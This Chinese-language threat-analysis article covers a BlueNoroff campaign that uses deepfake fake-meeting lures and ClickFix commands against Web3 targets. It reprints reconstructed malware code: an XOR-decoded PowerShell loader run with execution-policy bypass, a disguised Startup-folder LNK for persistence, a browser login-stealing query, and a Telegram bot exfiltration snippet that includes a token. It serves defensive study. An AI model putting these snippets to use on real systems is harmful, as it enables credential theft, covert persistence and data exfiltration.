摘要

研究報告深入探討由 Threat actor BlueNoroff 發動的精密入侵活動。該活動結合進階社交工程、AI 生成深偽媒體與多階段無檔案惡意程式,目標鎖定 Web3 與加密貨幣領域。透過分析點對點的攻擊週期,報告解析了「ClickFix」執行機制、利用 PowerShell 的 C2 後門架構,以及專門用來竊取瀏覽器認證資料的擷取管道。這些發現凸顯了該 actor 在建構逼真會議環境與繞過現代瀏覽器安全機制(如 App-Bound Encryption)方面的顯著進化 [1]

AI 不只生成圖文,還生成攻擊:BlueNoroff 如何用 LLM 深偽影片與假冒 Zoom 連結駭入 Web3 | 資訊安全新聞

1. 社交工程與 AI 增強的誘餌建構

此活動(campaign)的初始入侵階段仰賴精心設計的社交工程流程。Threat actor 假冒法律與金融領域的知名人士,透過 Calendly 發起接觸。此流程最終導向一個在誤植域名(typo-squatted domains)上代管的「假會議」,視覺上模仿 Zoom、Microsoft Teams 等合法視訊會議平台 [1]

這項活動中的一項關鍵革新,是使用了自我強化的媒體生成流程。該 actor 運用三種不同類型的假冒參與者內容,來提升會議的可信度:

  • 偷錄影片: 從先前受害者竊取而來的真實網路攝影機記錄,被重新用於冒充已知的相關人員。
  • AI 生成頭像: 使用先進 LLM 圖像模型產生的高解析度頭像,作為靜態占位圖。
  • Deepfake 合成影像: 最進階的技術,將 AI 生成的臉部對應到身體與動作來源,創造動態的「talking-head」影片 [1]

在會議過程中,誘餌頁面會透過 getUserMedia API 擷取受害者的即時攝影機畫面,這些畫面隨後會被外傳到攻擊者的基礎設施,用於未來行動。這形成了一個遞迴的假冒與認證竊取循環 [1]

2. ClickFix 執行機制

從社交工程到技術入侵的過渡,是由「ClickFix」手法促成的。當受害者嘗試加入假會議時,介面會模擬一個技術錯誤(例如「找不到音訊/視訊驅動程式」)。接著,受害者會收到提示,要求透過彈出視窗中提供的指令來「修正」問題。這個指令實際上是一個惡意腳本,受害者會在社交工程手法下被誘導複製並貼到終端機中執行 [2]

下圖說明了從初次點擊到部署 C2 後門的執行流程:

graph TD A[Victim Clicks
Typo-squatted Zoom Link] --> B[Fake Meeting Interface
Loads] B --> C[Simulated
Technical Error Popup] C --> D[Victim Copies
'Fix' Command] D --> E[Victim Executes Command
in PowerShell] E --> F[Stage A:
Fileless PowerShell C2
Implant] F --> G[System Fingerprinting
& Persistence] G --> H[Stage B:
Browser Credential Stealer]

3. 多階段惡意程式架構

3.1 階段 A:無檔案 PowerShell C2 後門

階段 A 的後門是一個無檔案 PowerShell 腳本,設計用於執行持續性、擷取系統特徵以及 Payload 交付。它的運作方式是將加密後的 Payload 直接下載到記憶體中,將於受害者磁碟上留下的痕跡降到最低。該腳本使用 Base64 編碼與 XOR 混淆的啟動機制,在系統重新開機後重新與 C2 伺服器建立通訊 [1]

  1. # Reconstructed Bootstrap Logic for Stage A Persistence
  2. $sta = "%USERPROFILE%\chrome-debug-data001.log"
  3. # Read the encoded payload from the log file
  4. $encodedContent = Get-Content $sta
  5. # Decode using Base64 and XOR with 0x43
  6. $decodedScript = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encodedContent) | ForEach-Object { $_ -bxor 0x43 })
  7. # Execute the decoded script in memory
  8. powershell.exe -ep Bypass -c "$decodedScript | iex"

3.2 階段 B:進階瀏覽器 Credential 擷取

階段 B 的 Payload 是一個以 MSVC 編譯的精密 PE 執行檔,專門用於竊取 Chromium 系瀏覽器(Chrome、Edge、Brave)中的 Credential。此竊取程式的顯著功能是能夠繞過 Chrome 最新版本中導入的「App-Bound Encryption」機制 [1]

擷取流程分為三個階段:

  1. Master Key 復原: 竊取程式會實體化瀏覽器的 COM 提升服務( IElevator 介面),以解密位於 Local State JSON 檔案中的 app_bound_encrypted_key
  2. 資料庫解密: 復原後的 32 位元組 Master Key 被用來透過 Windows BCrypt API 以及 AES-256-GCM 演算法,解密儲存在瀏覽器 SQLite 資料庫中的 Credential 資料塊。
  3. 資料篩選: 竊取程式查詢 Login Data 資料庫,並提取 origin_url username_value password_value ,尤其專注於加密貨幣錢包擴充功能 [1]
  1. // Pseudo-code for Stage B SQL Query Preparation</span>
  2. // The stealer opens the SQLite database with SQLITE_OPEN_READONLY | SQLITE_OPEN_NOMUTEX
  3. const char* query = "SELECT origin_url, username_value, password_value FROM logins;";
  4. sqlite3_prepare_v2(db, query, -1, &stmt, NULL);
  5. while (sqlite3_step(stmt) == SQLITE_ROW) {
  6. const char* url = (const char*)sqlite3_column_text(stmt, 0);
  7. const char* user = (const char*)sqlite3_column_text(stmt, 1);
  8. // The password blob is decrypted using the recovered AES-GCM key
  9. decrypt_blob(sqlite3_column_blob(stmt, 2), key);
  10. }

4. 持續性與權限提升

持續性是透過放在使用者「啟動」資料夾中的 Windows 捷徑 (.LNK) 檔案來維持。該 LNK 檔案偽裝成「Chrome Update」,並以最小化視窗執行 PowerShell bootstrap payload,以避免偵測。此外,該 actor 利用 COM 提升 Moniker( Elevation:Administrator!new )的 UAC 繞過技術,在不觸發使用者提示的情況下取得管理員權限 [1]

  1. # Persistence LNK Creation Logic
  2. $WshShell = New-Object -ComObject WScript.Shell
  3. $Shortcut = $WshShell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update - Certificated.lnk")
  4. $Shortcut.TargetPath = "powershell.exe"
  5. $Shortcut.Arguments = "-ep Bypass -WindowStyle Hidden -c \"Get-Content '$env:USERPROFILE\chrome-debug-data001.log' | iex\""
  6. $Shortcut.IconLocation = "C:\Program Files\Google\Chrome\Application\chrome.exe,0"
  7. $Shortcut.WindowStyle = 7 # Minimized
  8. $Shortcut.Save()

5. 資料外傳管道

該活動使用兩種主要方法來外傳資料。第一種方法是透過 HTTP POST 請求,將系統特徵與擷取的螢幕截圖傳送到專屬的外傳端點。第二種更具韌性的方法,是使用 Telegram Bot API 將螢幕截圖直接發送到攻擊者控制的聊天室。這種方法特別有效,因為它利用了合法的加密流量,使得基於網路層級的資安控管機制難以將其與正常活動區分 [1]

  1. # Telegram Screenshot Exfiltration Logic</span>
  2. $botToken = "8446140951:AAExeAepUZQAegP0A9IQbp__JB4xDaq4ohc"
  3. $chatId = "7016628218"
  4. $url = "https://api.telegram.org/bot$botToken/sendPhoto"
  5. <span class="code-comment"># Capture screen and send as multipart/form-data</span>
  6. $screenshot = Capture-Screen
  7. Invoke-RestMethod -Uri $url -Method Post -Form @{
  8. chat_id = $chatId
  9. photo = $screenshot
  10. caption = "$env:USERNAME | $env:COMPUTERNAME | $(Get-Date)"
  11. }

6. 結論

BlueNoroff 最新活動所展現的技術成熟度,顯示出高度的營運成熟性。透過將 AI 生成的 Deepfake 整合到社交工程流程,並運用進階技術繞過瀏覽器安全性,該 actor 顯著提升了入侵的成功率。Web3 領域的組織必須採取多層次的防禦策略,包括強健的端點偵測、網路流量分析,以及全面的資安意識培訓,以降低此類進階持續性威脅所帶來的風險 [3]